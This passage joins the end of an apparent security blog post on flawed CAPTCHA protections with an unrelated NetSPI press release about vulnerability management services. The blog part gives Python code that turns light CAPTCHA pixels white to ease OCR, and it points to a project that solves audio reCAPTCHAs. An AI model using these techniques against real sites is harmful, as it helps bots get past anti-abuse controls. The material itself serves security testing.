The majority of attackers wouldn’t spend the time required to solve this type of CAPTCHA unless it was protecting something pretty sensitive, so of the three bad examples we’ve shown, this was the best: the application DID require the CAPTCHA to be solved on each submission and did NOT accept replayed CAPTCHA requests. This type of CAPTCHA provides “good enough” protection by adding an extra layer of complexity that would prevent automated submissions by bots.

Another Transformation Example

Even though the CAPTCHAs from our first example had a flaw that made it unnecessary to solve them by OCR, here’s an example of how CAPTCHAs could be transformed to make them easier to identify in an automated attack:

Original Image           

Transformed Image

Here’s the relevant python code used to transform the second set of CAPTCHAs:

import numpy as np
from PIL import Image

startimagepath = 'captcha.png'    # placeholder path to the original CAPTCHA image
imagepath = 'captcha_clean.png'   # placeholder path for the transformed output

def change_to_white(data, r, g, b):
    # Replace every pixel matching the (r, g, b) color with white,
    # using the red/green/blue bands unpacked from the image below.
    target_color = (red == r) & (blue == b) & (green == g)
    data[..., :-1][target_color.T] = (255, 255, 255)
    return data

im = Image.open(startimagepath)
im = im.convert('RGBA')

data = np.array(im)   # "data" is a height x width x 4 numpy array
red, green, blue, alpha = data.T   # Temporarily unpack the bands for readability

colors = []
for x in range(0, len(red[0])):   # Cycle through the numpy array and store individual color combinations
    for i in range(0, len(red)):
        color = (red[i][x], green[i][x], blue[i][x])
        colors.append(color)
unique_colors = set(colors)   # Grab out the unique colors from the image

# Cycle through the unique colors in the image and replace all "light" colors with white
for u in unique_colors:
    if sum(u) > 220:   # Consider a color "light" if the sum of its red, green, and blue values is greater than 220
        data = change_to_white(data, u[0], u[1], u[2])

# Save the new image
im2 = Image.fromarray(data)
im2.save(imagepath)

Google Solves their own reCAPTCHAs

While Google has since made improvements to their reCAPTCHAs, there was a proof-of-concept GitHub project that used Google’s Speech Recognition service to solve the audio portion of reCAPTCHAs. Project info can be found here: https://github.com/ecthros/uncaptcha

Wrap-Up

Web application vulnerabilities continue to be a significant risk to organizations. Silent Break Security understands the offensive and defensive mindset of security, and can help your organization better prevent, detect, and defend against attackers through more sophisticated testing and collaborative remediation.


NetSPI Announces New Advisory Services Focused on Threat and Vulnerability Management

NetSPI LLC, the leading security testing and vulnerability orchestration company, today announced a new professional services line delivering Threat and Vulnerability Management Program Development. This new offering expands NetSPI’s professional services and leverages the power of the NetSPI Resolve™ software platform.

As the threat landscape grows in complexity, NetSPI remains committed to helping clients solve the vulnerability management challenge. Enterprises are overwhelmed with application and infrastructure vulnerabilities and have identified the need for a solution that expands beyond technical testing. NetSPI’s solution helps customers evolve from tactical and reactive penetration testing to a proactive program that reduces risk to their business.

“Our clients are faced with a constantly changing attack surface and new emerging threats every day. We created this offering to help them build a program to quickly identify and fix the vulnerabilities most impactful to their business,” said Charles Horton, senior vice president of professional services.


NetSPI’s service is designed to help clients evaluate and understand how well they are managing technical vulnerabilities and reducing risk. Their Threat and Vulnerability Management Program Framework evaluates programs in a consistent manner, providing maturity evaluation and a roadmap for continuous improvement. NetSPI focuses on seven foundational elements that must work in concert to address the vulnerability management challenge and reduce risk:

  • Asset Management
  • Configuration Management
  • Secure Software Development
  • Vulnerability and Patch Management
  • Technical Testing
  • Threat Intelligence and Monitoring
  • Incident Response

“While many service providers offer solutions focusing broadly on overall security strategy or narrowly focused segments of the challenge, we address vulnerability management holistically,” said Deke George, NetSPI chief executive officer. “NetSPI is an industry leader in the technical testing space, and this service builds upon that expertise to better strategically serve our clients.”

More information about this service can be found here. On March 8, 2018 at 1:00 p.m. CST, NetSPI is hosting an educational webinar on this topic and will provide attendees with tools, techniques, and best practices for assessing their organization’s security maturity. Register today at https://www.netsp.com/research/cybersecurity-webinars.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com.
